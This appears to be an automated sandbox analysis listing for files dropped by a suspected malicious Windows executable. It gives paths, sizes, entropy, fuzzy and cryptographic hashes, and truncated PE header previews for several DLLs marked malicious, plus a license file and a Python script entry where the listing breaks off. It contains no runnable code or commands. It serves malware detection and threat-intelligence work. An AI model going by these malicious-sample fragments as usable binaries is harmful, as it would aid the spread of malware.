                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".........R..............................................@......t.....`.................................................l................ ...............0..p...p...................................8...............@............................text.............................. .P`.rdata..n8.......:..................@.P@.data...............................@.P..pdata....... ......................@.0@.reloc..p....0......................@.0B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4159488
                                                                                                                                                                                                                              Entropy (8bit):6.720248846572849
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:49152:WxSmaMP/3coIly5VGmMWD3vZBMCbeYWl2DKkUYuqTtT6KkGiqJTtJDT:AcCGLSj76KkWJD
                                                                                                                                                                                                                              MD5:771534B138A85927974D5C03403AC80B
                                                                                                                                                                                                                              SHA1:DCB422720C3B2FB8CBD39839078A5396AE0FC541
                                                                                                                                                                                                                              SHA-256:91CB793590F15E62172B6B7F75C5998F0FD3F7A6D14AA5540A3F4CA015ABC3E9
                                                                                                                                                                                                                              SHA-512:33841B6D0943A685B8CA6E7B860A514A28E7AD69476F155407D52D6EEF450D3F3709CBB3E4947682839C1DBE4C10E1F3C0F5DC65742388177D20BFE08FD466B4
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."......2..X......T.2......................................0A......]@...`..........................................?;.t...4@;.@............ ?...............A..#...o8......................q8.(....o8.8.............2.h............................text.....2.......2................. .P`.rdata........2.......2.............@.P@.data.........;......d;.............@.P..pdata....... ?......~=.............@.0@.reloc...#....A..$...T?.............@.0B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):279040
                                                                                                                                                                                                                              Entropy (8bit):6.224717565729779
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:uJGFkCjS3571R/F0fPnbp01IbX53ucVTRfTpZx+NZl2U+g3jgwy1eoge:uJAjS3/R/anH53ucVTNEpUhe
                                                                                                                                                                                                                              MD5:01A83D747E1EEED644A6DC88F348DF81
                                                                                                                                                                                                                              SHA1:B999B0345993F362409F59CCC712418309CD70FE
                                                                                                                                                                                                                              SHA-256:67D9AB6E9A63B0527D2689B33CD3ADC940F4C6871664756468D332B5F55BDA32
                                                                                                                                                                                                                              SHA-512:2526CDEA6830077130D292A7697A058CB5962A010C9FC982700D29216740C4CC4A812B994375D690ECD59B5DA376A8275686EDA4CF489CBBD74C7B29C3D70C28
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".........P...............................................p.......6....`......................................... 1..p....1...............P..X............`......@...............................`...8............................................text...R........................... .P`.rdata...9.......:..................@.P@.data........@.......,..............@.P..pdata..X....P.......0..............@.0@.reloc.......`.......@..............@.0B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):108032
                                                                                                                                                                                                                              Entropy (8bit):6.299033314588888
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:P7d2r1oKsmot9KBQqaGOZDbP5ngZpp3LHaKil69swNrDsqt4fFB:5wY7KHapjZgZppjhX9swNrDsqt4fv
                                                                                                                                                                                                                              MD5:19556F1D5B5C2D6E5FBE27D461DE4DD9
                                                                                                                                                                                                                              SHA1:D2A68F16F656CBFFB0FAC61C0FE50A81FB68723A
                                                                                                                                                                                                                              SHA-256:0ED54C728F64B550B07A9523AEF31A96B0D7B980AF879F11FE7F9FCA8959A0B2
                                                                                                                                                                                                                              SHA-512:48ADB7AF9A8AD39C0E311F53CC627F045BA1643D8AFAF610BEC9CFF002D93CDD59849ACA46D287D5EF7ADFD1B97523573B7C744058C41BEBC44D0CF1A30C8D35
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".....R...V......pV..............................................y.....`.............................................l..........................................................................0...8............p..H............................text...8Q.......R.................. .P`.rdata...7...p...8...V..............@.P@.data...............................@.P..pdata..............................@.0@.reloc..............................@.0B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):226304
                                                                                                                                                                                                                              Entropy (8bit):6.476563765592159
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:eAMAcuCeDjpWODa3JX0GnWhVZYDq9QKQdAXy58gzAtNtz3A1TzUWAKBFmRnt:eAjcG1WODa3JX0x1QgXyBWjwTRAKXQt
                                                                                                                                                                                                                              MD5:FBE670C1F46D363FA48386F2A8FFB334
                                                                                                                                                                                                                              SHA1:3A8BF74B943C14F317BCB7E428420F657E3AC0F2
                                                                                                                                                                                                                              SHA-256:3FF576C4B25BB11D093F23C22908DF27B9F9450F4B59820B5FF8BB8820311640
                                                                                                                                                                                                                              SHA-512:950EC875407DCDA767BA9EA7C617AED743AC108B84433E67D441996E04E56D201B7C19A9B0254A3E1B1583916E8095F716427A0573082C73420AB0CCD2D0A3F2
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."................................................................M.....`..........................................U.. ....^..x...............................P....8...............................9..8............................................text............................... .P`.rdata..\...........................@.P@.data...8............^..............@.P..pdata...............`..............@.0@.reloc..P............r..............@.0B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):167936
                                                                                                                                                                                                                              Entropy (8bit):6.1599583746309134
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:X6dM96V3jflSmyzGuuBKNr8RWzmpdnxbLM03c:X6dM9E3jflSmyaVQ9FzQ73c
                                                                                                                                                                                                                              MD5:551E7F7A2F2ECE49279AFFC703940EA5
                                                                                                                                                                                                                              SHA1:1A270C18F6A1FD21D5B0980D86CEEAA68FFA184E
                                                                                                                                                                                                                              SHA-256:50CD91905E7B1B93F77DE916FABC53111C99F28ED98E29859C9BBF9BE5FCE292
                                                                                                                                                                                                                              SHA-512:E94593D02D315870E0CD3A46A184E019A3A7DD08FAD8769A8146E055344C6BE70723A6641AF4FA0F1F50B24FD1DE222A587D44C7331A9B0B94733020326DC1EB
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".........n......."..............................................FV....`..........................................q..`....q..x....................................a..............................0a..8............0.. ............................text............................... .P`.rdata...X...0...Z..."..............@.P@.data................|..............@.P..pdata..............................@.0@.reloc..............................@.0B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):748032
                                                                                                                                                                                                                              Entropy (8bit):6.322076507441975
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:yd3MbPgKkTyEOvuxHEY/ChxPZAxewMjw4Jm:Y3ygKVEOv+h/C5woLJm
                                                                                                                                                                                                                              MD5:4A9E628BB3DE384DC4A622F8B8EC768A
                                                                                                                                                                                                                              SHA1:8F81B14351978D214B5804AD60A017ABF9715576
                                                                                                                                                                                                                              SHA-256:E2D24C89BF3F747F930520A3BCB18639088922C12497B431E020BCEBD231D372
                                                                                                                                                                                                                              SHA-512:4186A2D33E6BF8F4283135241C032C191E070299AEAEA433510E1FD51E07B160263C3A646CFBE0BCAC54F6C8F47910D9F1219A6FE0E0C6DC61686DA90FA8F431
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."................0...............................................A.....`.................................................l...........................................................................8............................................text...8........................... .P`.rdata..:Y.......Z..................@.P@.data....E...@..."...&..............@.P..pdata...............H..............@.0@.reloc...............f..............@.0B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):89088
                                                                                                                                                                                                                              Entropy (8bit):6.142901641844917
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:75yx+TYs+6S/TF7K1uA64NHo3avnpt53ID6GTmdWUqAMx53PBS2AS:7M+TLPSrFNA64NRvnptWUqAMxbS2AS
                                                                                                                                                                                                                              MD5:749B786F9E22D2C2568A845A264D077C
                                                                                                                                                                                                                              SHA1:8DA1A2F6CE0570C703607A96FE68DD258604AFF1
                                                                                                                                                                                                                              SHA-256:CA617673BA3EC4376490CB3CFDA2C61825BED98C6288B08D9EC3213E099BBD6E
                                                                                                                                                                                                                              SHA-512:7C6EB07EDE5B7D39BFBEC1F17D07EB38D7FB4AE9C6B8D5F463089B47D3AA236A3818F2CCEE44F85BA1B0278B094A39B265B972FFB57576336E89B227360E39A2
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".........z............................................................`..........................................>..`....>..x...............(....................1...............................1..8...............H............................text...H........................... .P`.rdata..Fb.......d..................@.P@.data...h....`.......F..............@.P..pdata..(............P..............@.0@.reloc...............Z..............@.0B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):96768
                                                                                                                                                                                                                              Entropy (8bit):6.070710207063242
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:09aJTaSaUKVjVH/pLipojyDSxpPuvZ69VxiGPW5wyKikBtdi:00OJUKHp2OyYGwi5Patd
                                                                                                                                                                                                                              MD5:0C0C2EA20931677010B3B5C81497DF5C
                                                                                                                                                                                                                              SHA1:DC89ECA3C710F2858B24C4BC03ECB50C625FC558
                                                                                                                                                                                                                              SHA-256:0C3EE662BE462994E76D32DCE18B07F0C5A79362182FAD5D3EC949F64E48E272
                                                                                                                                                                                                                              SHA-512:C3D1410038A81EC778CA8A99B978D1C8C9F45A1D3E6B6FDB2AC3793E0DE59BE71627D3870C6B99E83BCA2590A4A17E5F890D2474A7A3581864325DB22AD4F33B
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."......................................................................`..........................................W..\...LX..x...............................H....J...............................J..8...............8............................text............................... .P`.rdata...k.......l..................@.P@.data...(....p.......`..............@.P..pdata...............n..............@.0@.reloc..H............x..............@.0B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):81920
                                                                                                                                                                                                                              Entropy (8bit):6.04788799513661
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:Bx75TOnYA/Gwdr9W7JBBqvbawGKj5ztbaBB/jf5:B/OnlGIKBwv9j5ztG/jR
                                                                                                                                                                                                                              MD5:B22B47AA975763D430C73AC71FD1E374
                                                                                                                                                                                                                              SHA1:99FB11E17DD2127BDD0575E2ABB3ABB55B70452B
                                                                                                                                                                                                                              SHA-256:4207DC23D56E9AE66E14A956735AB955E4835C767A50ACF3C8F8E9A36DE9BFE8
                                                                                                                                                                                                                              SHA-512:BF750BD0DC2517220B5F4C8BB395FC8757E2E2B3F32B861324DAF26D95580585FD10166C629FDFF9BA64562D281EAC912A771AE18527E0440A1529DC85459186
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".........r............................................................`..........................................(..`....)..x............`..\............p..........................................8...............H............................text............................... .P`.rdata...\.......^..................@.P@.data........@.......,..............@.P..pdata..\....`.......6..............@.0@.reloc.......p.......>..............@.0B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):62464
                                                                                                                                                                                                                              Entropy (8bit):5.870269324324492
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:ly9OSfUi7fLVKDpc+tYCZSAbJHGlditEIPg/g6XsaHWq6RI4oPdxr369BIEAtX16:WBNLVKhtOmGldiTPW2qb7r3KBIdF6
                                                                                                                                                                                                                              MD5:BC7EB816D8BAC39C7003355003BF81C3
                                                                                                                                                                                                                              SHA1:2A1B151C5E72D4EF881848661DFD019B1B461316
                                                                                                                                                                                                                              SHA-256:D5F22B88AEC2236A56C1E2D9990CEC4E00BDA4DB155D9B0425B34450950BDE9E
                                                                                                                                                                                                                              SHA-512:7CA957E9D5B77305F91FD3043A4975699025CAC11790C6B8FE8A3A4FAA2A6F4E9B570EFC99F449D763DC8BC97C7AE2307A6E121ADCAAC52ADECB5E610D155F7C
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".........\...............................................@.......2....`.........................................0...\.......x............ ...............0......P...............................p...8............................................text...H........................... .P`.rdata...F.......H..................@.P@.data...............................@.P..pdata....... ......................@.0@.reloc.......0......................@.0B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):172032
                                                                                                                                                                                                                              Entropy (8bit):6.185207380152101
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:nC9DM1eFU3uj+IRZXU/W7bbJ73qK3CHd2qN4HEHFTA02+Warahu2+Warahj3qSkT:nC9DM4FU3ujlZkO7bpabHzls02+Warac
                                                                                                                                                                                                                              MD5:B611CA8FA3BC87A7355DDCCDBE8F3F93
                                                                                                                                                                                                                              SHA1:77EBF15AF059B5CDB1295F57717143DF6111EC69
                                                                                                                                                                                                                              SHA-256:396BEB486E9FDDDA95DC53A6F1096ADBBD8926F5AA3034EBBF45185A304106C1
                                                                                                                                                                                                                              SHA-512:5C0BB488BE86D87F079419273DCD93950BA860EB61FF013B71D77C30829C8DBBBB1E05D514B427303EE4F37B143288EA8ACBD9CD44AA483B1D6952EB1E201A34
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".................................................................|....`..........................................{..l...|{..x...............<....................h...............................i..8...............p............................text...h........................... .P`.rdata.."...........................@.P@.data....$...........z..............@.P..pdata..<...........................@.0@.reloc..............................@.0B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):633344
                                                                                                                                                                                                                              Entropy (8bit):6.234804700155333
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:S1zC7nG0yt2OXWFIPwnc7n0gZCoajSFNjwGd:S1zCEAoYIMo0gLFV5
                                                                                                                                                                                                                              MD5:772D36DFBBCBC3B635E638F3CC25036A
                                                                                                                                                                                                                              SHA1:7ABB0403BB8A44679683BD844DA93D81CBD06A13
                                                                                                                                                                                                                              SHA-256:403FDB6EE6C3CA96108F2360F949CB9EBF6B7BB3A3C55ED014D2AEC5E75AFAE7
                                                                                                                                                                                                                              SHA-512:3D9637539A4CF2E5C13C9577331E86DAF2C4B6E9E6C0231CD435A547EC5FE647B1411C2F9B707CA594374A78D9F509E724F508D58455ED0236229404CDC1B311
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".....T...R.......X....................................................`..........................................m.......u..................................x....L..............................0L..8............p...............................text....S.......T.................. .P`.rdata.......p.......X..............@.P@.data...h6...........v..............@.P..pdata..............................@.0@.reloc..x...........................@.0B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):202008
                                                                                                                                                                                                                              Entropy (8bit):6.367263484296302
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:4nwukKYdeMwj1XQk67ZLXni8Es7sp0HhiviBvDKax:KrqiviMax
                                                                                                                                                                                                                              MD5:815F1BDABB79C6A12B38D84AA343196D
                                                                                                                                                                                                                              SHA1:916483149875A5E20C6046CEFFEF62DD6089DDD5
                                                                                                                                                                                                                              SHA-256:31712AE276E2CED05ECDA3E1C08FBBCC2CFF8474A972626ABA55F7797F0ED8C9
                                                                                                                                                                                                                              SHA-512:1078E7E48B6F6ED160AE2BCCF80A43A5F1CCA769B8A690326E112BF20D7F3D018F855F6AA3B56D315DC0853472E0AFFCFE8E910B5CE69CE952983CFAA496C21D
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!...@..@..@..8N..@.:...@.:...@.:...@.:...@.....@..8..@..@..@.....@.....@..."..@.....@.Rich.@.........PE..d.....f.........." ...(..................................................... ......?.....`............................................P...@............................/..........`4..T........................... 3..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...p ..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6927640
                                                                                                                                                                                                                              Entropy (8bit):5.765554952149868
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:49152:Jc7/HNCHh0IWiUDFsx3hghs7g6kIPuch+Xe16/02yWYqiVx7qb4f4wmC36nhIVcF:JcBZhxsje2kUvid5E+vbHDMiEr/l9o
                                                                                                                                                                                                                              MD5:CAE8FA4E7CB32DA83ACF655C2C39D9E1
                                                                                                                                                                                                                              SHA1:7A0055588A2D232BE8C56791642CB0F5ABBC71F8
                                                                                                                                                                                                                              SHA-256:8AD53C67C2B4DB4387D5F72EE2A3CA80C40AF444B22BF41A6CFDA2225A27BB93
                                                                                                                                                                                                                              SHA-512:DB2190DA2C35BCEED0EF91D7553FF0DEA442286490145C3D0E89DB59BA1299B0851E601CC324B5F7FD026414FC73755E8EFF2EF5FB5EEB1C54A9E13E7C66DD0C
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D..Z%..Z%..Z%......X%....e.T%......^%......R%......W%..S]..@%...]..Q%..Z%..*$..O....%..O...[%..O.g.[%..O...[%..RichZ%..........PE..d......f.........." ...(..(..6B...............................................j......dj...`.........................................pdN.d....1O.......i......._.`I....i../... i..[..0.2.T.....................H.(....2.@............ (..............................text.....(.......(................. ..`.rdata..f7'.. (..8'...(.............@..@.data....J...`O......HO.............@....pdata..`I...._..J....^.............@..@PyRuntim0.....b.......a.............@....rsrc.........i...... h.............@..@.reloc...[... i..\...*h.............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):134656
                                                                                                                                                                                                                              Entropy (8bit):5.9953900911096785
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:Yuh2G0a2fYrFceQaVK756Y/r06trvoEKQAe7KL8KJKVKGajt4:Yuh2faiYrFceQaVfY/rxTBAe7KwKwVrE
                                                                                                                                                                                                                              MD5:26D752C8896B324FFD12827A5E4B2808
                                                                                                                                                                                                                              SHA1:447979FA03F78CB7210A4E4BA365085AB2F42C22
                                                                                                                                                                                                                              SHA-256:BD33548DBDBB178873BE92901B282BAD9C6817E3EAC154CA50A666D5753FD7EC
                                                                                                                                                                                                                              SHA-512:99C87AB9920E79A03169B29A2F838D568CA4D4056B54A67BC51CAF5C0FF5A4897ED02533BA504F884C6F983EBC400743E6AD52AC451821385B1E25C3B1EBCEE0
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.$g..wg..wg..wn.[wk..w5..vc..w..5wf..w5..vs..w5..vo..w5..vd..ws..vf..w...ve..ws..vl..wg..w...w...vj..w...vf..w...vf..wRichg..w........PE..d......d.........." ................L........................................P............`......................................... u..`B......,....0..l.......L............@..0...`Q..T............................Q..8............................................text............................... ..`.rdata..R...........................@..@.data....-.......(..................@....pdata..L...........................@..@.rsrc...l....0......................@..@.reloc..0....@......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):31000
                                                                                                                                                                                                                              Entropy (8bit):6.553885009751671
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:I8RVBC9t6Lhz64SHfZslDT90YBI1QGjHQIYiSy1pCQQRaAM+o/8E9VF0NytuSS:1GyqHfK1HBI1QGT5YiSyvXAMxkEm
                                                                                                                                                                                                                              MD5:79CE1AE3A23DFF6ED5FC66E6416600CD
                                                                                                                                                                                                                              SHA1:6204374D99144B0A26FD1D61940FF4F0D17C2212
                                                                                                                                                                                                                              SHA-256:678E09AD44BE42FA9BC9C7A18C25DBE995A59B6C36A13EECC09C0F02A647B6F0
                                                                                                                                                                                                                              SHA-512:A4E48696788798A7D061C0EF620D40187850741C2BEC357DB0E37A2DD94D3A50F9F55BA75DC4D95E50946CBAB78B84BA1FC42D51FD498640A231321566613DAA
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........t..'..'..'..g'..'-..&..'-..&..'-..&..'-..&..'...&..'..'...'...&..'...&..'...&..'...'..'...&..'Rich..'................PE..d.....f.........." ...(.....2......................................................._....`..........................................@..L...<A..x....p.......`.......J.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...`....P.......8..............@....pdata.......`.......:..............@..@.rsrc........p.......>..............@..@.reloc..L............H..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7634
                                                                                                                                                                                                                              Entropy (8bit):4.503638339817033
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:qnJvhVL0qhYqlpIle4RrJQSqOBng4kS/cKM6b:4vjxhYWpce48engvK
                                                                                                                                                                                                                              MD5:8466CFC6533376D42EFA6F7423F2B8E8
                                                                                                                                                                                                                              SHA1:2BC8926FDBB07DB2AF0A8E3FF7A3BE545C8BDF6B
                                                                                                                                                                                                                              SHA-256:ADE78D04982D69972D444A8E14A94F87A2334DD3855CC80348EA8E240AA0DF2D
                                                                                                                                                                                                                              SHA-512:CC45DC470E107E63659B502F77E9EF44335F9427BE87639252D85181A8DEA65FA9D1B5F1BD196F782186BC61B144467888199537806A8CC15E2B462CAC0D46A5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:GNU LESSER GENERAL PUBLIC LICENSE. Version 3, 29 June 2007.. Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed.... This version of the GNU Lesser General Public License incorporates.the terms and conditions of version 3 of the GNU General Public.License, supplemented by the additional permissions listed below... 0. Additional Definitions... As used herein, "this License" refers to version 3 of the GNU Lesser.General Public License, and the "GNU GPL" refers to version 3 of the GNU.General Public License... "The Library" refers to a covered work governed by this License,.other than an Application or a Combined Work as defined below... An "Application" is any work that makes use of an interface provided.by the Library, but which is not otherwise based on the Library..Defining a subclass of a class defined by the Library is de
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with very long lines (855)
